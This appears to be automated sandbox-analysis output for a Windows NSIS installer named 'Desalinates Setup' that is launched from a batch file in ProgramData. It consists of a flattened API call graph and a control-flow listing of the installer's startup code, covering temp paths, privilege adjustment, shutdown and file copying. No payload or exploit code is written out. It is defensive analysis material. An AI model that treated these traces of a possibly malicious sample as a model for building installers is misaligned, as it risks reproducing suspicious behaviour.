6e3a26e2 4712->4716 4713 6e3a277d GlobalAlloc 4717 6e3a27a0 4713->4717 4714 6e3a2790 4715 6e3a2796 GlobalSize 4714->4715 4714->4717 4715->4717 4716->4713 4716->4714 4717->4644 4719 6e3a2cce 4718->4719 4720 6e3a2d0e GlobalFree 4719->4720 4775 6e3a1215 GlobalAlloc 4721->4775 4723 6e3a2598 WideCharToMultiByte 4729 6e3a24e4 4723->4729 4724 6e3a2563 lstrcpynA 4724->4729 4725 6e3a2574 StringFromGUID2 WideCharToMultiByte 4725->4729 4726 6e3a25dd GlobalFree 4726->4729 4727 6e3a25b9 wsprintfA 4727->4729 4728 6e3a2617 GlobalFree 4728->4636 4729->4723 4729->4724 4729->4725 4729->4726 4729->4727 4729->4728 4730 6e3a1266 2 API calls 4729->4730 4776 6e3a12d1 4729->4776 4730->4729 4780 6e3a1215 GlobalAlloc 4732->4780 4734 6e3a155e 4735 6e3a156b 2 API calls 4734->4735 4736 6e3a1568 4735->4736 4737 6e3a1266 4736->4737 4738 6e3a12a8 GlobalFree 4737->4738 4739 6e3a126f GlobalAlloc lstrcpynA 4737->4739 4738->4641 4739->4738 4741 6e3a1577 wsprintfA 4740->4741 4742 6e3a15a4 lstrcpyA 4740->4742 4745 6e3a15bd 4741->4745 4742->4745 4745->4645 4747 6e3a24ac 4746->4747 4748 6e3a17ef 4746->4748 4747->4748 4749 6e3a24c5 GlobalFree 4747->4749 4748->4652 4748->4654 4749->4747 4751 6e3a1266 2 API calls 4750->4751 4752 6e3a1503 4751->4752 4752->4655 4753->4661 4754->4664 4756 6e3a1552 4755->4756 4756->4664 4763 6e3a1215 GlobalAlloc 4757->4763 4759 6e3a1233 lstrcpynA 4759->4671 4760->4690 4761->4679 4762->4671 4763->4759 4765 6e3a12b4 4764->4765 4766 6e3a1224 2 API calls 4765->4766 4767 6e3a12cf 4766->4767 4767->4693 4769 6e3a26aa 4768->4769 4770 6e3a2654 VirtualAlloc 4768->4770 4769->4701 4770->4769 4772 6e3a29ef 4771->4772 4773 6e3a29ff 4772->4773 4774 6e3a29f4 GetLastError 4772->4774 4773->4706 4774->4773 4775->4729 4777 6e3a12da 4776->4777 4778 6e3a12f9 4776->4778 4777->4778 4779 6e3a12e0 lstrcpyA 4777->4779 4778->4729 4779->4778 4780->4734 4781 4025ea 4782 402603 4781->4782 4783 4025ef 4781->4783 4785 402b2c 17 API calls 4782->4785 4790 402b0a 4783->4790 4786 40260a lstrlenA 4785->4786 4787 4025f8 4786->4787 4788 405c2d WriteFile 4787->4788 4789 40262c 4787->4789 4788->4789 4791 40600f 17 API calls 4790->4791 4792 402b1f 4791->4792 4792->4787 4793 40166a 4794 402b2c 17 API calls 4793->4794 4795 401671 4794->4795 4796 402b2c 17 API calls 4795->4796 4797 40167a 4796->4797 4798 402b2c 17 API calls 4797->4798 4799 401683 MoveFileA 4798->4799 4800 401696 4799->4800 4806 40168f 4799->4806 4802 4062f0 2 API calls 4800->4802 4803 4022a9 4800->4803 4801 401423 24 API calls 4801->4803 4804 4016a5 4802->4804 4804->4803 4805 405dcc 36 API calls 4804->4805 4805->4806 4806->4801 5230 4019ed 5231 402b2c 17 API calls 5230->5231 5232 4019f4 5231->5232 5233 402b2c 17 API calls 5232->5233 5234 4019fd 5233->5234 5235 401a04 lstrcmpiA 5234->5235 5236 401a16 lstrcmpA 5234->5236 5237 401a0a 5235->5237 5236->5237 4819 4026ef 4820 4026f6 4819->4820 4821 402965 4819->4821 4822 402b0a 17 API calls 4820->4822 4823 4026fd 4822->4823 4824 40270c SetFilePointer 4823->4824 4824->4821 4825 40271c 4824->4825 4827 405f4b wsprintfA 4825->4827 4827->4821 4828 40156f 4829 401586 4828->4829 4830 40157f ShowWindow 4828->4830 4831 402965 4829->4831 4832 401596 ShowWindow 4829->4832 4830->4829 4832->4831 4833 402960 4832->4833 4835 405f4b wsprintfA 4833->4835 4835->4831 5238 4014f4 SetForegroundWindow 5239 4029b8 5238->5239 5240 6e3a1000 5241 6e3a101b 5 API calls 5240->5241 5242 6e3a1019 5241->5242 5243 401cfb 5244 402b0a 17 API calls 5243->5244 5245 401d02 5244->5245 5246 402b0a 17 API calls 5245->5246 5247 401d0e GetDlgItem 5246->5247 5248 4025e4 5247->5248 5249 4018fd 5250 401934 5249->5250 5251 402b2c 17 API calls 5250->5251 5252 401939 5251->5252 5253 4057b5 67 API calls 5252->5253 5254 401942 5253->5254 5255 401dff GetDC 5256 402b0a 17 API calls 5255->5256 5257 401e11 GetDeviceCaps MulDiv ReleaseDC 5256->5257 5258 402b0a 17 API calls 5257->5258 5259 401e42 5258->5259 5260 40600f 17 API calls 5259->5260 5261 401e7f CreateFontIndirectA 5260->5261 5262 4025e4 5261->5262 5263 401000 5264 401037 BeginPaint GetClientRect 5263->5264 5265 40100c DefWindowProcA 5263->5265 5267 4010f3 5264->5267 5268 401179 5265->5268 5269 401073 CreateBrushIndirect FillRect DeleteObject 5267->5269 5270 4010fc 5267->5270 5269->5267 5271 401102 CreateFontIndirectA 5270->5271 5272 401167 EndPaint 5270->5272 5271->5272 5273 401112 6 API calls 5271->5273 5272->5268 5273->5272 5274 404a80 GetDlgItem GetDlgItem 5275 404ad6 7 API calls 5274->5275 5280 404cfd 5274->5280 5276 404b72 SendMessageA 5275->5276 5277 404b7e DeleteObject 5275->5277 5276->5277 5278 404b89 5277->5278 5279 404bc0 5278->5279 5281 40600f 17 API calls 5278->5281 5282 40407b 18 API calls 5279->5282 5287 404ddf 5280->5287 5308 404d6c 5280->5308 5327 4049ce SendMessageA 5280->5327 5285 404ba2 SendMessageA SendMessageA 5281->5285 5286 404bd4 5282->5286 5283 404e8b 5284 404e95 SendMessageA 5283->5284 5291 404e9d 5283->5291 5284->5291 5285->5278 5293 40407b 18 API calls 5286->5293 5287->5283 5288 404e38 SendMessageA 5287->5288 5317 404cf0 5287->5317 5295 404e4d SendMessageA 5288->5295 5288->5317 5289 4040e2 8 API calls 5296 405081 5289->5296 5290 404dd1 SendMessageA 5290->5287 5297 404eb6 5291->5297 5298 404eaf ImageList_Destroy 5291->5298 5302 404ec6 5291->5302 5305 404be5 5293->5305 5294 405035 5303 405047 ShowWindow GetDlgItem ShowWindow 5294->5303 5294->5317 5300 404e60 5295->5300 5301 404ebf GlobalFree 5297->5301 5297->5302 5298->5297 5299 404cbf GetWindowLongA SetWindowLongA 5304 404cd8 5299->5304 5310 404e71 SendMessageA 5300->5310 5301->5302 5302->5294 5320 404f01 5302->5320 5332 404a4e 5302->5332 5303->5317 5306 404cf5 5304->5306 5307 404cdd ShowWindow 5304->5307 5305->5299 5309 404c37 SendMessageA 5305->5309 5311 404cba 5305->5311 5314 404c75 SendMessageA 5305->5314 5315 404c89 SendMessageA 5305->5315 5326 4040b0 SendMessageA 5306->5326 5325 4040b0 SendMessageA 5307->5325 5308->5287 5308->5290 5309->5305 5310->5283 5311->5299 5311->5304 5314->5305 5315->5305 5317->5289 5318 40500b InvalidateRect 5318->5294 5319 405021 5318->5319 5341 404989 5319->5341 5321 404f2f SendMessageA 5320->5321 5324 404f45 5320->5324 5321->5324 5323 404fb9 SendMessageA SendMessageA 5323->5324 5324->5318 5324->5323 5325->5317 5326->5280 5328 4049f1 GetMessagePos ScreenToClient SendMessageA 5327->5328 5329 404a2d SendMessageA 5327->5329 5330 404a25 5328->5330 5331 404a2a 5328->5331 5329->5330 5330->5308 5331->5329 5344 405fed lstrcpynA 5332->5344 5334 404a61 5345 405f4b wsprintfA 5334->5345 5336 404a6b 5337 40140b 2 API calls 5336->5337 5338 404a74 5337->5338 5346 405fed lstrcpynA 5338->5346 5340 404a7b 5340->5320 5347 4048c4 5341->5347 5343 40499e 5343->5294 5344->5334 5345->5336 5346->5340 5348 4048da 5347->5348 5349 40600f 17 API calls 5348->5349 5350 40493e 5349->5350 5351 40600f 17 API calls 5350->5351 5352 404949 5351->5352 5353 40600f 17 API calls 5352->5353 5354 40495f lstrlenA wsprintfA SetDlgItemTextA 5353->5354 5354->5343 5355 401900 5356 402b2c 17 API calls 5355->5356 5357 401907 5356->5357 5358 405709 MessageBoxIndirectA 5357->5358 5359 401910 5358->5359 5360 401502 5361 40150a 5360->5361 5363 40151d 5360->5363 5362 402b0a 17 API calls 5361->5362 5362->5363 5364 405088 5365 405098 5364->5365 5366 4050ac 5364->5366 5367 4050f5 5365->5367 5368 40509e 5365->5368 5369 4050b4 IsWindowVisible 5366->5369 5375 4050cb 5366->5375 5370 4050fa CallWindowProcA 5367->5370 5371 4040c7 SendMessageA 5368->5371 5369->5367 5372 4050c1 5369->5372 5373 4050a8 5370->5373 5371->5373 5374 4049ce 5 API calls 5372->5374 5374->5375 5375->5370 5376 404a4e 4 API calls 5375->5376 5376->5367 5377 401c0a 5378 402b0a 17 API calls 5377->5378 5379 401c11 5378->5379 5380 402b0a 17 API calls 5379->5380 5381 401c1e 5380->5381 5382 401c33 5381->5382 5383 402b2c 17 API calls 5381->5383 5384 402b2c 17 API calls 5382->5384 5387 401c43 5382->5387 5383->5382 5384->5387 5385 401c9a 5389 402b2c 17 API calls 5385->5389 5386 401c4e 5388 402b0a 17 API calls 5386->5388 5387->5385 5387->5386 5390 401c53 5388->5390 5391 401c9f 5389->5391 5393 402b0a 17 API calls 5390->5393 5392 402b2c 17 API calls 5391->5392 5394 401ca8 FindWindowExA 5392->5394 5395 401c5f 5393->5395 5398 401cc6 5394->5398 5396 401c8a SendMessageA 5395->5396 5397 401c6c SendMessageTimeoutA 5395->5397 5396->5398 5397->5398 5399 40450d 5400 404539 5399->5400 5401 40454a 5399->5401 5460 4056ed GetDlgItemTextA 5400->5460 5403 404556 GetDlgItem 5401->5403 5410 4045b5 5401->5410 5406 40456a 5403->5406 5404 404699 5409 404843 5404->5409 5462 4056ed GetDlgItemTextA 5404->5462 5405 404544 5407 406257 5 API calls 5405->5407 5408 40457e SetWindowTextA 5406->5408 5412 405a1e 4 API calls 5406->5412 5407->5401 5413 40407b 18 API calls 5408->5413 5416 4040e2 8 API calls 5409->5416 5410->5404 5410->5409 5414 40600f 17 API calls 5410->5414 5418 404574 5412->5418 5419 40459a 5413->5419 5420 404629 SHBrowseForFolderA 5414->5420 5415 4046c9 5421 405a73 18 API calls 5415->5421 5417 404857 5416->5417 5418->5408 5425 405985 3 API calls 5418->5425 5422 40407b 18 API calls 5419->5422 5420->5404 5423 404641 CoTaskMemFree 5420->5423 5424 4046cf 5421->5424 5426 4045a8 5422->5426 5427 405985 3 API calls 5423->5427 5463 405fed lstrcpynA 5424->5463 5425->5408 5461 4040b0 SendMessageA 5426->5461 5429 40464e 5427->5429 5432 404685 SetDlgItemTextA 5429->5432 5436 40600f 17 API calls 5429->5436 5431 4045ae 5434 406385 5 API calls 5431->5434 5432->5404 5433 4046e6 5435 406385 5 API calls 5433->5435 5434->5410 5442 4046ed 5435->5442 5437 40466d lstrcmpiA 5436->5437 5437->5432 5440 40467e lstrcatA 5437->5440 5438 404729 5464 405fed lstrcpynA 5438->5464 5440->5432 5441 404730 5443 405a1e 4 API calls 5441->5443 5442->5438 5446 4059cc 2 API calls 5442->5446 5448 404781 5442->5448 5444 404736 GetDiskFreeSpaceA 5443->5444 5447 40475a MulDiv 5444->5447 5444->5448 5446->5442 5447->5448 5449 4047f2 5448->5449 5451 404989 20 API calls 5448->5451 5450 404815 5449->5450 5452 40140b 2 API calls 5449->5452 5465 40409d KiUserCallbackDispatcher 5450->5465 5453 4047df 5451->5453 5452->5450 5455 4047f4 SetDlgItemTextA 5453->5455 5456 4047e4 5453->5456 5455->5449 5458 4048c4 20 API calls 5456->5458 5457 404831 5457->5409 5459 404466 SendMessageA 5457->5459 5458->5449 5459->5409 5460->5405 5461->5431 5462->5415 5463->5433 5464->5441 5465->5457 4836 401e8f 4837 402b0a 17 API calls 4836->4837 4838 401e95 4837->4838 4839 402b0a 17 API calls 4838->4839 4840 401ea1 4839->4840 4841 401eb8 EnableWindow 4840->4841 4842 401ead ShowWindow 4840->4842 4843 4029b8 4841->4843 4842->4843 5466 401490 5467 405114 24 API calls 5466->5467 5468 401497 5467->5468 5469 402993 SendMessageA 5470 4029ad InvalidateRect 5469->5470 5471 4029b8 5469->5471 5470->5471 5472 401f98 5473 402b2c 17 API calls 5472->5473 5474 401f9f 5473->5474 5475 4062f0 2 API calls 5474->5475 5476 401fa5 5475->5476 5478 401fb7 5476->5478 5479 405f4b wsprintfA 5476->5479 5479->5478 5480 6e3a2be3 5481 6e3a2bfb 5480->5481 5482 6e3a1534 2 API calls 5481->5482 5483 6e3a2c16 5482->5483 5484 6e3a10e0 5486 6e3a110e 5484->5486 5485 6e3a11c4 GlobalFree 5486->5485 5487 6e3a12ad 2 API calls 5486->5487 5488 6e3a11c3 5486->5488 5489 6e3a1266 2 API calls 5486->5489 5490 6e3a1155 GlobalAlloc 5486->5490 5491 6e3a11ea GlobalFree 5486->5491 5492 6e3a12d1 lstrcpyA 5486->5492 5493 6e3a11b1 GlobalFree 5486->5493 5487->5486 5488->5485 5489->5493 5490->5486 5491->5486 5492->5486 5493->5486 5494 40149d 5495 4014ab PostQuitMessage 5494->5495 5496 40234e 5494->5496 5495->5496 5497 40159d 5498 402b2c 17 API calls 5497->5498 5499 4015a4 SetFileAttributesA 5498->5499 5500 4015b6 5499->5500 5501 401a1e 5502 402b2c 17 API calls 5501->5502 5503 401a27 ExpandEnvironmentStringsA 5502->5503 5504 401a3b 5503->5504 5506 401a4e 5503->5506 5505 401a40 lstrcmpA 5504->5505 5504->5506 5505->5506 5512 40289e 5513 402b0a 17 API calls 5512->5513 5514 4028a4 5513->5514 5515 4028e3 5514->5515 5516 4028cc 5514->5516 5525 402783 5514->5525 5517 4028fd 5515->5517 5518 4028ed 5515->5518 5519 4028d1 5516->5519 5520 4028e0 5516->5520 5522 40600f 17 API calls 5517->5522 5521 402b0a 17 API calls 5518->5521 5526 405fed lstrcpynA 5519->5526 5520->5525 5527 405f4b wsprintfA 5520->5527 5521->5520 5522->5520 5526->5525 5527->5525 5528 40171f 5529 402b2c 17 API calls 5528->5529 5530 401726 SearchPathA 5529->5530 5531 401741 5530->5531 5532 6e3a225a 5533 6e3a22c4 5532->5533 5534 6e3a22cf GlobalAlloc 5533->5534 5535 6e3a22ee 5533->5535 5534->5533 5536 401d20 5537 402b0a 17 API calls 5536->5537 5538 401d2e SetWindowLongA 5537->5538 5539 4029b8 5538->5539 5540 402721 5541 402727 5540->5541 5542 4029b8 5541->5542 5543 40272f FindClose 5541->5543 5543->5542 5544 6e3a1058 5546 6e3a1074 5544->5546 5545 6e3a10dc 5546->5545 5547 6e3a14bb GlobalFree 5546->5547 5548 6e3a1091 5546->5548 5547->5548 5549 6e3a14bb GlobalFree 5548->5549 5550 6e3a10a1 5549->5550 5551 6e3a10a8 GlobalSize 5550->5551 5552 6e3a10b1 5550->5552 5551->5552 5553 6e3a10c6 5552->5553 5554 6e3a10b5 GlobalAlloc 5552->5554 5556 6e3a10d1 GlobalFree 5553->5556 5555 6e3a14e2 3 API calls 5554->5555 5555->5553 5556->5545 5557 4027a3 5558 402b2c 17 API calls 5557->5558 5559 4027b1 5558->5559 5560 4027c7 5559->5560 5561 402b2c 17 API calls 5559->5561 5562 405b61 2 API calls 5560->5562 5561->5560 5563 4027cd 5562->5563 5585 405b86 GetFileAttributesA CreateFileA 5563->5585 5565 4027da 5566 4027e6 GlobalAlloc 5565->5566 5567 40287d 5565->5567 5570 402874 CloseHandle 5566->5570 5571 4027ff 5566->5571 5568 402885 DeleteFileA 5567->5568 5569 402898 5567->5569 5568->5569 5570->5567 5586 403200 SetFilePointer 5571->5586 5573 402805 5574 4031ea ReadFile 5573->5574 5575 40280e GlobalAlloc 5574->5575 5576 402852 5575->5576 5577 40281e 5575->5577 5579 405c2d WriteFile 5576->5579 5578 402ffb 31 API calls 5577->5578 5584 40282b 5578->5584 5580 40285e GlobalFree 5579->5580 5581 402ffb 31 API calls 5580->5581 5582 402871 5581->5582 5582->5570 5583 402849 GlobalFree 5583->5576 5584->5583 5585->5565 5586->5573 4010 403ba7 4011 403cfa 4010->4011 4012 403bbf 4010->4012 4014 403d4b 4011->4014 4015 403d0b GetDlgItem GetDlgItem 4011->4015 4012->4011 4013 403bcb 4012->4013 4017 403bd6 SetWindowPos 4013->4017 4018 403be9 4013->4018 4016 403da5 4014->4016 4027 401389 2 API calls 4014->4027 4019 40407b 18 API calls 4015->4019 4073 403cf5 4016->4073 4081 4040c7 4016->4081 4017->4018 4021 403c06 4018->4021 4022 403bee ShowWindow 4018->4022 4023 403d35 SetClassLongA 4019->4023 4024 403c28 4021->4024 4025 403c0e DestroyWindow 4021->4025 4022->4021 4026 40140b 2 API calls 4023->4026 4028 403c2d SetWindowLongA 4024->4028 4029 403c3e 4024->4029 4035 404004 4025->4035 4026->4014 4030 403d7d 4027->4030 4028->4073 4031 403ce7 4029->4031 4032 403c4a GetDlgItem 4029->4032 4030->4016 4033 403d81 SendMessageA 4030->4033 4103 4040e2 4031->4103 4037 403c7a 4032->4037 4038 403c5d SendMessageA IsWindowEnabled 4032->4038 4033->4073 4034 40140b 2 API calls 4071 403db7 4034->4071 4040 404035 ShowWindow 4035->4040 4035->4073 4036 404006 DestroyWindow EndDialog 4036->4035 4042 403c87 4037->4042 4045 403cce SendMessageA 4037->4045 4046 403c9a 4037->4046 4053 403c7f 4037->4053 4038->4037 4038->4073 4040->4073 4041 40600f 17 API calls 4041->4071 4042->4045 4042->4053 4044 40407b 18 API calls 4044->4071 4045->4031 4048 403ca2 4046->4048 4049 403cb7 4046->4049 4047 403cb5 4047->4031 4097 40140b 4048->4097 4050 40140b 2 API calls 4049->4050 4052 403cbe 4050->4052 4052->4031 4052->4053 4100 404054 4053->4100 4055 403e32 GetDlgItem 4056 403e47 4055->4056 4057 403e4f ShowWindow KiUserCallbackDispatcher 4055->4057 4056->4057 4087 40409d KiUserCallbackDispatcher 4057->4087 4059 403e79 EnableWindow 4064 403e8d 4059->4064 4060 403e92 GetSystemMenu EnableMenuItem SendMessageA 4061 403ec2 SendMessageA 4060->4061 4060->4064 4061->4064 4064->4060 4088 4040b0 SendMessageA 4064->4088 4089 403b88 4064->4089 4092 405fed lstrcpynA 4064->4092 4066 403ef1 lstrlenA 4067 40600f 17 API calls 4066->4067 4068 403f02 SetWindowTextA 4067->4068 4093 401389 4068->4093 4070 403f46 DestroyWindow 4070->4035 4072 403f60 CreateDialogParamA 4070->4072 4071->4034 4071->4036 4071->4041 4071->4044 4071->4070 4071->4073 4084 40407b 4071->4084 4072->4035 4074 403f93 4072->4074 4075 40407b 18 API calls 4074->4075 4076 403f9e GetDlgItem GetWindowRect ScreenToClient SetWindowPos 4075->4076 4077 401389 2 API calls 4076->4077 4078 403fe4 4077->4078 4078->4073 4079 403fec ShowWindow 4078->4079 4080 4040c7 SendMessageA 4079->4080 4080->4035 4082 4040d0 SendMessageA 4081->4082 4083 4040df 4081->4083 4082->4083 4083->4071 4085 40600f 17 API calls 4084->4085 4086 404086 SetDlgItemTextA 4085->4086 4086->4055 4087->4059 4088->4064 4090 40600f 17 API calls 4089->4090 4091 403b96 SetWindowTextA 4090->4091 4091->4064 4092->4066 4095 401390 4093->4095 4094 4013fe 4094->4071 4095->4094 4096 4013cb MulDiv SendMessageA 4095->4096 4096->4095 4098 401389 2 API calls 4097->4098 4099 401420 4098->4099 4099->4053 4101 404061 SendMessageA 4100->4101 4102 40405b 4100->4102 4101->4047 4102->4101 4104 4041a5 4103->4104 4105 4040fa GetWindowLongA 4103->4105 4104->4073 4105->4104 4106 40410f 4105->4106 4106->4104 4107 40413c GetSysColor 4106->4107 4108 40413f 4106->4108 4107->4108 4109 404145 SetTextColor 4108->4109 4110 40414f SetBkMode 4108->4110 4109->4110 4111 404167 GetSysColor 4110->4111 4112 40416d 4110->4112 4111->4112 4113 404174 SetBkColor 4112->4113 4114 40417e 4112->4114 4113->4114 4114->4104 4115 404191 DeleteObject 4114->4115 4116 404198 CreateBrushIndirect 4114->4116 4115->4116 4116->4104 5587 4023a7 5588 402b2c 17 API calls 5587->5588 5589 4023b8 5588->5589 5590 402b2c 17 API calls 5589->5590 5591 4023c1 5590->5591 5592 402b2c 17 API calls 5591->5592 5593 4023cb GetPrivateProfileStringA 5592->5593 5594 6e3a15d1 5595 6e3a14bb GlobalFree 5594->5595 5598 6e3a15e9 5595->5598 5596 6e3a162f GlobalFree 5597 6e3a1604 5597->5596 5598->5596 5598->5597 5599 6e3a161b VirtualFree 5598->5599 5599->5596 5600 40292c 5601 402b0a 17 API calls 5600->5601 5602 402932 5601->5602 5603 402967 5602->5603 5605 402944 5602->5605 5606 402783 5602->5606 5604 40600f 17 API calls 5603->5604 5603->5606 5604->5606 5605->5606 5608 405f4b wsprintfA 5605->5608 5608->5606 4844 402631 4845 402b0a 17 API calls 4844->4845 4848 40263b 4845->4848 4846 405bfe ReadFile 4846->4848 4847 4026ab 4853 405f4b wsprintfA 4847->4853 4848->4846 4848->4847 4849 4026bb 4848->4849 4851 4026a9 4848->4851 4849->4851 4852 4026d1 SetFilePointer 4849->4852 4852->4851 4853->4851 5609 4041b1 lstrcpynA lstrlenA 5610 4022b2 5611 402b2c 17 API calls 5610->5611 5612 4022b8 5611->5612 5613 402b2c 17 API calls 5612->5613 5614 4022c1 5613->5614 5615 402b2c 17 API calls 5614->5615 5616 4022ca 5615->5616 5617 4062f0 2 API calls 5616->5617 5618 4022d3 5617->5618 5619 4022e4 lstrlenA lstrlenA 5618->5619 5620 4022d7 5618->5620 5622 405114 24 API calls 5619->5622 5621 405114 24 API calls 5620->5621 5624 4022df 5620->5624 5621->5624 5623 402320 SHFileOperationA 5622->5623 5623->5620 5623->5624 5625 402334 5626 40233b 5625->5626 5629 40234e 5625->5629 5627 40600f 17 API calls 5626->5627 5628 402348 5627->5628 5628->5629 5630 405709 MessageBoxIndirectA 5628->5630 5630->5629 5631 4014b7 5632 4014bd 5631->5632 5633 401389 2 API calls 5632->5633 5634 4014c5 5633->5634 5635 402138 5636 402b2c 17 API calls 5635->5636 5637 40213f 5636->5637 5638 402b2c 17 API calls 5637->5638 5639 402149 5638->5639 5640 402b2c 17 API calls 5639->5640 5641 402153 5640->5641 5642 402b2c 17 API calls 5641->5642 5643 40215d 5642->5643 5644 402b2c 17 API calls 5643->5644 5645 402167 5644->5645 5646 4021a9 CoCreateInstance 5645->5646 5647 402b2c 17 API calls 5645->5647 5650 4021c8 5646->5650 5652 402273 5646->5652 5647->5646 5648 401423 24 API calls 5649 4022a9 5648->5649 5651 402253 MultiByteToWideChar 5650->5651 5650->5652 5651->5652 5652->5648 5652->5649 4971 4015bb 4972 402b2c 17 API calls 4971->4972 4973 4015c2 4972->4973 4974 405a1e 4 API calls 4973->4974 4986 4015ca 4974->4986 4975 401624 4977 401652 4975->4977 4978 401629 4975->4978 4976 4059b0 CharNextA 4976->4986 4981 401423 24 API calls 4977->4981 4979 401423 24 API calls 4978->4979 4980 401630 4979->4980 4991 405fed lstrcpynA 4980->4991 4988 40164a 4981->4988 4983 405657 2 API calls 4983->4986 4984 405674 5 API calls 4984->4986 4985 40163b SetCurrentDirectoryA 4985->4988 4986->4975 4986->4976 4986->4983 4986->4984 4987 4015f3 4986->4987 4989 40160c GetFileAttributesA 4986->4989 4987->4986 4990 4055da 4 API calls 4987->4990 4989->4986 4990->4987 4991->4985 5653 4016bb 5654 402b2c 17 API calls 5653->5654 5655 4016c1 GetFullPathNameA 5654->5655 5656 4016d8 5655->5656 5657 4016f9 5655->5657 5656->5657 5660 4062f0 2 API calls 5656->5660 5658 4029b8 5657->5658 5659 40170d GetShortPathNameA 5657->5659 5659->5658 5661 4016e9 5660->5661 5661->5657 5663 405fed lstrcpynA 5661->5663 5663->5657 5664 40273b 5665 402741 5664->5665 5666 402745 FindNextFileA 5665->5666 5668 402757 5665->5668 5667 402796 5666->5667 5666->5668 5670 405fed lstrcpynA 5667->5670 5670->5668 5671 40243d 5672 402b2c 17 API calls 5671->5672 5673 40244f 5672->5673 5674 402b2c 17 API calls 5673->5674 5675 402459 5674->5675 5688 402bbc 5675->5688 5678 4029b8 5679 40248e 5681 40249a 5679->5681 5682 402b0a 17 API calls 5679->5682 5680 402b2c 17 API calls 5684 402487 lstrlenA 5680->5684 5683 4024b9 RegSetValueExA 5681->5683 5685 402ffb 31 API calls 5681->5685 5682->5681 5686 4024cf RegCloseKey 5683->5686 5684->5679 5685->5683 5686->5678 5689 402bd7 5688->5689 5692 405ea1 5689->5692 5693 405eb0 5692->5693 5694 402469 5693->5694 5695 405ebb RegCreateKeyExA 5693->5695 5694->5678 5694->5679 5694->5680 5695->5694 5696 401b3f 5697 402b2c 17 API calls 5696->5697 5698 401b46 5697->5698 5699 402b0a 17 API calls 5698->5699 5700 401b4f wsprintfA 5699->5700 5701 4029b8 5700->5701

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 0 403248-403287 SetErrorMode GetVersion 1 403289-403291 call 406385 0->1 2 40329a 0->2 1->2 8 403293 1->8 3 40329f-4032b2 call 406317 lstrlenA 2->3 9 4032b4-4032d0 call 406385 * 3 3->9 8->2 16 4032e1-40333f #17 OleInitialize SHGetFileInfoA call 405fed GetCommandLineA call 405fed 9->16 17 4032d2-4032d8 9->17 24 403341-403346 16->24 25 40334b-403360 call 4059b0 CharNextA 16->25 17->16 22 4032da 17->22 22->16 24->25 28 403425-403429 25->28 29 403365-403368 28->29 30 40342f 28->30 31 403370-403378 29->31 32 40336a-40336e 29->32 33 403442-40345c GetTempPathA call 403217 30->33 34 403380-403383 31->34 35 40337a-40337b 31->35 32->31 32->32 40 4034b4-4034ce DeleteFileA call 402dc4 33->40 41 40345e-40347c GetWindowsDirectoryA lstrcatA call 403217 33->41 37 403415-403422 call 4059b0 34->37 38 403389-40338d 34->38 35->34 37->28 57 403424 37->57 43 4033a5-4033d2 38->43 44 40338f-403395 38->44 59 403562-403572 call 403730 OleUninitialize 40->59 60 4034d4-4034da 40->60 41->40 58 40347e-4034ae GetTempPathA lstrcatA SetEnvironmentVariableA * 2 call 403217 41->58 46 4033d4-4033da 43->46 47 4033e5-403413 43->47 50 403397-403399 44->50 51 40339b 44->51 53 4033e0 46->53 54 4033dc-4033de 46->54 47->37 55 403431-40343d call 405fed 47->55 50->43 50->51 51->43 53->47 54->47 54->53 55->33 57->28 58->40 58->59 72 403696-40369c 59->72 73 403578-403588 call 405709 ExitProcess 59->73 63 403552-403559 call 40380a 60->63 64 4034dc-4034e7 call 4059b0 60->64 70 40355e 63->70 77 4034e9-403512 64->77 78 40351d-403527 64->78 70->59 75 403718-403720 72->75 76 40369e-4036b7 GetCurrentProcess OpenProcessToken 72->76 79 403722 75->79 80 403726-40372a ExitProcess 75->80 84 4036e9-4036f7 call 406385 76->84 85 4036b9-4036e3 LookupPrivilegeValueA AdjustTokenPrivileges 76->85 86 403514-403516 77->86 82 403529-403536 call 405a73 78->82 83 40358e-4035a2 call 405674 lstrcatA 78->83 79->80 82->59 94 403538-40354e call 405fed * 2 82->94 95 4035a4-4035aa lstrcatA 83->95 96 4035af-4035c9 lstrcatA lstrcmpiA 83->96 97 403705-40370f ExitWindowsEx 84->97 98 4036f9-403703 84->98 85->84 86->78 90 403518-40351b 86->90 90->78 90->86 94->63 95->96 96->59 100 4035cb-4035ce 96->100 97->75 101 403711-403713 call 40140b 97->101 98->97 98->101 103 4035d0-4035d5 call 4055da 100->103 104 4035d7 call 405657 100->104 101->75 112 4035dc-4035e9 SetCurrentDirectoryA 103->112 104->112 113 4035f6-40361e call 405fed 112->113 114 4035eb-4035f1 call 405fed 112->114 118 403624-403640 call 40600f DeleteFileA 113->118 114->113 121 403681-403688 118->121 122 403642-403652 CopyFileA 118->122 121->118 123 40368a-403691 call 405dcc 121->123 122->121 124 403654-403674 call 405dcc call 40600f call 40568c 122->124 123->59 124->121 133 403676-40367d CloseHandle 124->133 133->121
                                                                        APIs
                                                                        • SetErrorMode.KERNELBASE ref: 0040326D
                                                                        • GetVersion.KERNEL32 ref: 00403273
                                                                        • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 004032A6
                                                                        • #17.COMCTL32(?,00000006,00000008,0000000A), ref: 004032E2
                                                                        • OleInitialize.OLE32(00000000), ref: 004032E9
                                                                        • SHGetFileInfoA.SHELL32(0079E508,00000000,?,00000160,00000000,?,00000006,00000008,0000000A), ref: 00403305
                                                                        • GetCommandLineA.KERNEL32(Desalinates Setup,NSIS Error,?,00000006,00000008,0000000A), ref: 0040331A
                                                                        • CharNextA.USER32(00000000,"C:\ProgramData\filaucioso.bat" ,00000020,"C:\ProgramData\filaucioso.bat" ,00000000,?,00000006,00000008,0000000A), ref: 00403356
                                                                        • GetTempPathA.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,00000000,00000020,?,00000006,00000008,0000000A), ref: 00403453
                                                                        • GetWindowsDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB,?,00000006,00000008,0000000A), ref: 00403464
                                                                        • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp,?,00000006,00000008,0000000A), ref: 00403470
                                                                        • GetTempPathA.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp,?,00000006,00000008,0000000A), ref: 00403484
                                                                        • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low,?,00000006,00000008,0000000A), ref: 0040348C
                                                                        • SetEnvironmentVariableA.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low,?,00000006,00000008,0000000A), ref: 0040349D
